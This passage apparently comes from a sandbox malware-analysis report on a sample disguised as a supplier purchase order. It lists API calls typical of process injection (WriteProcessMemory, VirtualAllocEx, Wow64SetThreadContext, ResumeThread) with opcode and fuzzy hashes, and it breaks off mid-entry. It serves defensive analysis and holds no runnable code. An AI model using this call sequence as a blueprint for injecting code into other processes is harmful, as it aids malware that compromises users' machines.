                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07BD0CB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: 2b5cb54fdb871feba458273ead714abc04a28608dd5762f703de9cd2b2561c01
                                    • Instruction ID: 77a42bcbdcf207b5002cf841ee2a4759da60e0115960c61112ddbe10b9bc0491
                                    • Opcode Fuzzy Hash: 2b5cb54fdb871feba458273ead714abc04a28608dd5762f703de9cd2b2561c01
                                    • Instruction Fuzzy Hash: 9121CEB5D002499FDB10DF9AD884AEEFBF5FB48320F14842AE919A7310D775A944CFA4
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09454918
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: b6ebdb05719790e3da606eb05e27b508c733681174bc7dc56e548f809be2912a
                                    • Instruction ID: 530ec91d1e74ecdc5bf46e7cae723d051de364ccab35ef8324a03ecd0cacacd2
                                    • Opcode Fuzzy Hash: b6ebdb05719790e3da606eb05e27b508c733681174bc7dc56e548f809be2912a
                                    • Instruction Fuzzy Hash: 9D2125B59003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7251D7789954CBA0
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 094549F8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: ee68d1f22a19db7c60cb07f6d0d6d0ee211b05362694b1fb37a575dc584f5633
                                    • Instruction ID: dfd5168a91ccd8ba50ad01ed8567ac7ec5daec6aa8bb62259a5079a50ca30703
                                    • Opcode Fuzzy Hash: ee68d1f22a19db7c60cb07f6d0d6d0ee211b05362694b1fb37a575dc584f5633
                                    • Instruction Fuzzy Hash: D22116B5C003599FCB14DFAAC981AEEBBF5FF48310F10842AE959A7251C7389940CFA0
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0945476E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 5885ee03597822fe70bbc742b00c2aec0f38b992b7d6b6bc88072ad4fda432fd
                                    • Instruction ID: 192e751df3b5fd073b1adff53ff0679d271cd1754432535a620683dca2c585d4
                                    • Opcode Fuzzy Hash: 5885ee03597822fe70bbc742b00c2aec0f38b992b7d6b6bc88072ad4fda432fd
                                    • Instruction Fuzzy Hash: C5213971D002098FDB14DFAAC4857EEBBF5EF89310F10842AD859A7251DB789985CFA1
                                    APIs
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 07BD484F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: FromMonitorPoint
                                    • String ID:
                                    • API String ID: 1566494148-0
                                    • Opcode ID: 8e286088ee130568ee7b21a06a16a9b21860708772338fd5eefdcc8e1ef34bb7
                                    • Instruction ID: 36582877e60b022780cf6c5f8ce9ef898571c3cd29aa7e7d7f400a65acaa3f92
                                    • Opcode Fuzzy Hash: 8e286088ee130568ee7b21a06a16a9b21860708772338fd5eefdcc8e1ef34bb7
                                    • Instruction Fuzzy Hash: 6D218EB49002899FDB10DFA9D4057AEFBB5FB88310F108419E955A7384C7395944CFA1
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 094549F8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 4dc0acc1b8e2ee2462cdd9cf0ee75ebfd9d31708c109469fbb855b20a7d600e0
                                    • Instruction ID: 8f33b41e8abb7da87400534a6a84feabc2a94c505b46825e7d227cf3ff7b081f
                                    • Opcode Fuzzy Hash: 4dc0acc1b8e2ee2462cdd9cf0ee75ebfd9d31708c109469fbb855b20a7d600e0
                                    • Instruction Fuzzy Hash: 442125B1C002499FCB10DFAAC981AEEBBF5FF48310F10842AE919A7250C7389940CBA1
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0945476E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: a33e30905045de1d07bef3401c169fa72ff095ba061d231b3bcdd5a4530b3424
                                    • Instruction ID: d8f03d150160afdd687eeb819e5ee841571051c26f63c0a7218971d435e964b4
                                    • Opcode Fuzzy Hash: a33e30905045de1d07bef3401c169fa72ff095ba061d231b3bcdd5a4530b3424
                                    • Instruction Fuzzy Hash: 2E213871D002098FDB10DFAAC4857AEBBF5EF49320F10842AD819A7251DB789984CFA0
                                    APIs
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 07BD484F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: FromMonitorPoint
                                    • String ID:
                                    • API String ID: 1566494148-0
                                    • Opcode ID: f205871fe5d04ce52d586a51e77724c05ed469c30f2beaba5ccdbd3069db1be4
                                    • Instruction ID: 1ad7ba24e336b703aefbae2902544518a12ca3659837dac98d83b74764c7651b
                                    • Opcode Fuzzy Hash: f205871fe5d04ce52d586a51e77724c05ed469c30f2beaba5ccdbd3069db1be4
                                    • Instruction Fuzzy Hash: 262159B5D002899FDB10DFA9D405BEEBBF5FB48714F108419D855AB380D339AA44CFA1
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019FD7B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: c65e54242926d524b50bef617865893a660a28d78aae40c34172db7ae03043dd
                                    • Instruction ID: 0b6280163367fd4a7f2ed6544c29dc81b24a61aa3d9fd40b32915f9f1d51910c
                                    • Opcode Fuzzy Hash: c65e54242926d524b50bef617865893a660a28d78aae40c34172db7ae03043dd
                                    • Instruction Fuzzy Hash: BE21C4B5900248AFDB10CF9AD984ADEFFF9FB48310F14841AE918A7350D378A954CFA5
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019FD7B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 333a2d6bee5e4200dbb47b0c9017ce25803095b74c222634c330ee9343ed49c5
                                    • Instruction ID: e4f5b2d0252194641f68695eaafdbd875805a91d779205dbcb2d15ac668b9f67
                                    • Opcode Fuzzy Hash: 333a2d6bee5e4200dbb47b0c9017ce25803095b74c222634c330ee9343ed49c5
                                    • Instruction Fuzzy Hash: B621E4B5900248DFDB10CF99D585ADEFBF5FB48310F14841AE918A7310C378A944CFA0
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09454836
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 19f68e0972f44169d7c0115fa4c6d830d460b8dcbcf3e955aefde88420212776
                                    • Instruction ID: 0ce72b0623916aadbcb778c7d30a5e0e8ec154f10744409da9529196beb34121
                                    • Opcode Fuzzy Hash: 19f68e0972f44169d7c0115fa4c6d830d460b8dcbcf3e955aefde88420212776
                                    • Instruction Fuzzy Hash: 671129759002499FCB24DFA9C8456EFBFF5FF88310F14841AE95AA7260C7399551CFA0
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09454836
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 9a3e532967575786f05d7677157af7da409c5cd430b2a19b61aaff43d15db9c1
                                    • Instruction ID: d212167dcfcbf9a44d01f7931c5f13b30e730b8c3608506734ff32941b5d4d76
                                    • Opcode Fuzzy Hash: 9a3e532967575786f05d7677157af7da409c5cd430b2a19b61aaff43d15db9c1
                                    • Instruction Fuzzy Hash: 45114975C002499FCB20DFAAC845AEFBFF5EF88320F10841AE919A7250C779A540CFA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 218e056d25d1beb727fb5c0dca09da97e55c46af0a8c454ef0559a6bee842be8
                                    • Instruction ID: 45ab3171146f32fc32fcb030390533f71589176d41223d6c5d590d352aa8d5aa
                                    • Opcode Fuzzy Hash: 218e056d25d1beb727fb5c0dca09da97e55c46af0a8c454ef0559a6bee842be8
                                    • Instruction Fuzzy Hash: AC112BB1D002488ECB24DFAAC4457EFFBF5EF88314F20841AD55AA7250CB795944CFA4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 29347ff51676ff1fbf9e30ad427fdc4673563e3019ef2b85f01cb118e29c4967
                                    • Instruction ID: 4fd9e096070449392ee3615b2b664bcf9f7401103af53eb617d2676f200b602d
                                    • Opcode Fuzzy Hash: 29347ff51676ff1fbf9e30ad427fdc4673563e3019ef2b85f01cb118e29c4967
                                    • Instruction Fuzzy Hash: 241128B1D002488BCB20DFAAC8457AEFBF5EF88320F20841AD519A7250CB79A544CFA5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 019FB09E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: b0cea3a2d5bfafe428c6c84b349dfca313e98118469445d8248b2223c535ecd9
                                    • Instruction ID: 5557a966f42102a760b562f7e15db9b9bea29dcaee85831069105797ff1e70f7
                                    • Opcode Fuzzy Hash: b0cea3a2d5bfafe428c6c84b349dfca313e98118469445d8248b2223c535ecd9
                                    • Instruction Fuzzy Hash: 991102B5C002498FDB20DF9AC444B9EFBF8AB88310F14841AD929A7200D379A545CFA5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 09458E55
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 208439989a67e7c734cb3e6d9a8a45e03374f5781defeb647bf63b5749824d7c
                                    • Instruction ID: b90ed4d1eb6ceaf7769d6084ae0123284ef99bda170c0a4c70ac06af8860ce97
                                    • Opcode Fuzzy Hash: 208439989a67e7c734cb3e6d9a8a45e03374f5781defeb647bf63b5749824d7c
                                    • Instruction Fuzzy Hash: 8C11E3B58003499FDB20DF99D885BEEBFF8FB48310F10845AE959A7211C379A544CFA1
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 09458E55
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 4d82c5e15902f316a9f294ec898b3d55bc279885e922f7f5cb9e58e3964e6338
                                    • Instruction ID: e0cda6a9ea45769f92df8397c079b508352efb86b89a0f19f4a1de41e514971f
                                    • Opcode Fuzzy Hash: 4d82c5e15902f316a9f294ec898b3d55bc279885e922f7f5cb9e58e3964e6338
                                    • Instruction Fuzzy Hash: AC1106B58003499FDB20DF9AC945BDEBBF8FB48310F10845AE919A7301C379A944CFA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160926213.000000000199D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0199D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_199d000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b06bd943d49f74a86ac2ebf9a023b79611c34afb2a2b7e80bbfcac04f70dd4c7
                                    • Instruction ID: 10f64afca90bd6641c8748d4447b13f6eff3726559602a3ff84387999e606a0e
                                    • Opcode Fuzzy Hash: b06bd943d49f74a86ac2ebf9a023b79611c34afb2a2b7e80bbfcac04f70dd4c7
                                    • Instruction Fuzzy Hash: F221F471500204DFDF05DF58D9C0F66BFA9FB98714F24C569D90D0B296C33AE456C6A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160969311.00000000019AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19ad000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 536f63f3a554b2c7bf19eff10a57cd4d3f3c2ca0cf7751910bb0e9f87ef6c9b9
                                    • Instruction ID: 5a6265c43b0ae239fd5a58b821ef77f8124b12627ab541500870246aebc8530a
                                    • Opcode Fuzzy Hash: 536f63f3a554b2c7bf19eff10a57cd4d3f3c2ca0cf7751910bb0e9f87ef6c9b9
                                    • Instruction Fuzzy Hash: A6212271684200DFDB15DF68D984F26BFA9FB88314F60C96DD90E4B656C33AD40BCAA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160969311.00000000019AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19ad000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ef388f2e4f03462538d1e2b050a4b0c0cda1f9dae55fcf70dc797b804d4a3a66
                                    • Instruction ID: a630846aa8cd1952c66a7d4568e59180b0382b1e776726b8f2059aa142a7b042
                                    • Opcode Fuzzy Hash: ef388f2e4f03462538d1e2b050a4b0c0cda1f9dae55fcf70dc797b804d4a3a66
                                    • Instruction Fuzzy Hash: CE21F571504204DFDB05DF98D5C0F26BBA9FB84324F60C96DDD0D4B656C33AD40ACAA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160969311.00000000019AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19ad000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aa442c5d575a85e68ccdab62f1befc647e5ad19d7615b290f22b242d9757b135
                                    • Instruction ID: 7b0c7b1985b4373f05e702e0b9bcab6fc3b3e30d5eedf8b3ef9be200d6c68319
                                    • Opcode Fuzzy Hash: aa442c5d575a85e68ccdab62f1befc647e5ad19d7615b290f22b242d9757b135
                                    • Instruction Fuzzy Hash: E021AE755483808FDB13CF64D994B15BFB1EB45314F28C5AAD8498B6A7C33A940ACBA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160926213.000000000199D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0199D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_199d000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                    • Instruction ID: 7818619f508ac1fcd4fecd4af59f42b5b89ab1f8b8b2267fe9f511512ab15642
                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                    • Instruction Fuzzy Hash: 2911CD72404240CFDF02CF48D5C4B56BFA2FB84624F24C6A9D9090B256C33AE45ACBA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160969311.00000000019AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19ad000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                    • Instruction ID: 095d71ee45f1b33937a33a6c481525d7f66e7b3d6948336db8b8ac4c361aa519
                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                    • Instruction Fuzzy Hash: 7511BB75504280DFDB02CF54C5C4B15BFA1FB84224F24C6A9DC494B6A6C33AD40ACBA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160926213.000000000199D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0199D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_199d000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 28dfa64bf0ce8343bde9fcd909085547f0ebd2acf51f97c2f2ee5bdc91a75e42
                                    • Instruction ID: 6cc595511af8361175cdc2053b88d504f12a306551802e36ec76038b587ff19a
                                    • Opcode Fuzzy Hash: 28dfa64bf0ce8343bde9fcd909085547f0ebd2acf51f97c2f2ee5bdc91a75e42
                                    • Instruction Fuzzy Hash: A301A7B10043849AEB209E9DCDC4B6AFFDCEF45325F18C96AED0D4A286D6799841CA71
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160926213.000000000199D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0199D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_199d000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 494b83329d2abe8f8dcbd3a965d01c12aa922252084cca53c7ecc149e02ae10c
                                    • Instruction ID: b5ba0fc0a1f7dfa54b5dc5b4ec92b0e80300decf081e297dff04f0ae83ec3f8c
                                    • Opcode Fuzzy Hash: 494b83329d2abe8f8dcbd3a965d01c12aa922252084cca53c7ecc149e02ae10c
                                    • Instruction Fuzzy Hash: 93F0C2714043849EEB208E1ACCC8B66FFECEF85235F18C45AED4C0A286C2799840CBB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: TJoq$Tejq$xbmq
                                    • API String ID: 0-903294719
                                    • Opcode ID: 028733333793ec7fd0428acac759c156040bc0fde60a4165376516a60e10fc21
                                    • Instruction ID: 47510426545b8d510a39e6b84c14896cf9a4be3506b4d9d20c218a99ffcfdb8f
                                    • Opcode Fuzzy Hash: 028733333793ec7fd0428acac759c156040bc0fde60a4165376516a60e10fc21
                                    • Instruction Fuzzy Hash: 67B161B5E016188FDB58DF6AC944ADDBBF2AF88301F14C1A9D409AB364EB345E858F50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,AF
                                    • API String ID: 0-1694988362
                                    • Opcode ID: 9f997e38e7440415e69619101a88511337857435ea6e19f649f3fb870145309c
                                    • Instruction ID: 1e223e6f23de03a7451cec661e5e292f7d83cd3f206acb3980ac7bbad97c3020
                                    • Opcode Fuzzy Hash: 9f997e38e7440415e69619101a88511337857435ea6e19f649f3fb870145309c
                                    • Instruction Fuzzy Hash: 7CE11574E001198FDB14DFA8C5809AEFBB2FF89341F24826AE815AB356C735AD45CF60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'jq
                                    • API String ID: 0-3676250632
                                    • Opcode ID: c3da349cbb17bb7d7a8f26c5df9b48efe27c6c751adb29dba9e9de63c71a3640
                                    • Instruction ID: fb8d17e0fa53404610473c6ab936e681ab2e9536c9fb8edd520f9ab523006111
                                    • Opcode Fuzzy Hash: c3da349cbb17bb7d7a8f26c5df9b48efe27c6c751adb29dba9e9de63c71a3640
                                    • Instruction Fuzzy Hash: 10610874A102098FDB18DF6AE941AAA7FF7FB88300F14D529D0199B268EB74AD05CF40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'jq
                                    • API String ID: 0-3676250632
                                    • Opcode ID: 24f7d70d571630ddc90a5ec7c6d6754d5618d7a97d8809cf4118d3256a6a9ce4
                                    • Instruction ID: 8b50c3d2b09180e6176bb8d6ce662cbc627be8e566bd76dddb1a5915ef1179bb
                                    • Opcode Fuzzy Hash: 24f7d70d571630ddc90a5ec7c6d6754d5618d7a97d8809cf4118d3256a6a9ce4
                                    • Instruction Fuzzy Hash: 9F610874A102098FDB18DF7AE941AAA7FF7FB88300F14D529D0599B268EB74AD05CF50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3d9efd81ce3418b6853f2e07175a85680c29de222e9bbbd25c70e73dadfbf77d
                                    • Instruction ID: d3eb2efba9dc63d344481f5386eafa37c778e6b804517580fe9b946d83032d2b
                                    • Opcode Fuzzy Hash: 3d9efd81ce3418b6853f2e07175a85680c29de222e9bbbd25c70e73dadfbf77d
                                    • Instruction Fuzzy Hash: 1BE12A74E041198FDB14DFA8C580AAEFBB2FF89301F24926AD815AB356D735AD41CF60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a7187afc21323c4c522f6ac8149bf90b13cc020192a1dc8461b94b54ccf2ac65
                                    • Instruction ID: 7a34a89ce6d5827a65efe9c6ebfa3c2c4ca6c62f7b7cb936a9f345c680f83d4a
                                    • Opcode Fuzzy Hash: a7187afc21323c4c522f6ac8149bf90b13cc020192a1dc8461b94b54ccf2ac65
                                    • Instruction Fuzzy Hash: 70E11874E001198FDB14CFA8C5809AEFBB2FF89315F24926AE815AB356C775AD41CF60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2f7d948d1e1717a4c847b083ee6d163c34e4c18ca97799cf626864cb46d740ab
                                    • Instruction ID: 38c41ceaf12fe2122ada57782cb1442c26fca2eeda9d5789e26d53905d2769fd
                                    • Opcode Fuzzy Hash: 2f7d948d1e1717a4c847b083ee6d163c34e4c18ca97799cf626864cb46d740ab
                                    • Instruction Fuzzy Hash: F5E11A74E001198FDB14CFA8C5809AEFBB2FF89305F24816AD815AB366D735AD81CF60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a34edbd835f437163acf8aa34372aecbbef46ef25b44dff10e983d33872ce02a
                                    • Instruction ID: 7b9e10e0231d856c4d16b73e791126c1629db39f269315e815498b42471c7073
                                    • Opcode Fuzzy Hash: a34edbd835f437163acf8aa34372aecbbef46ef25b44dff10e983d33872ce02a
                                    • Instruction Fuzzy Hash: BBE1F874E001198FDB14CFA9C5809AEFBB2FF89305F24926AE815AB356D735AD41CF60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
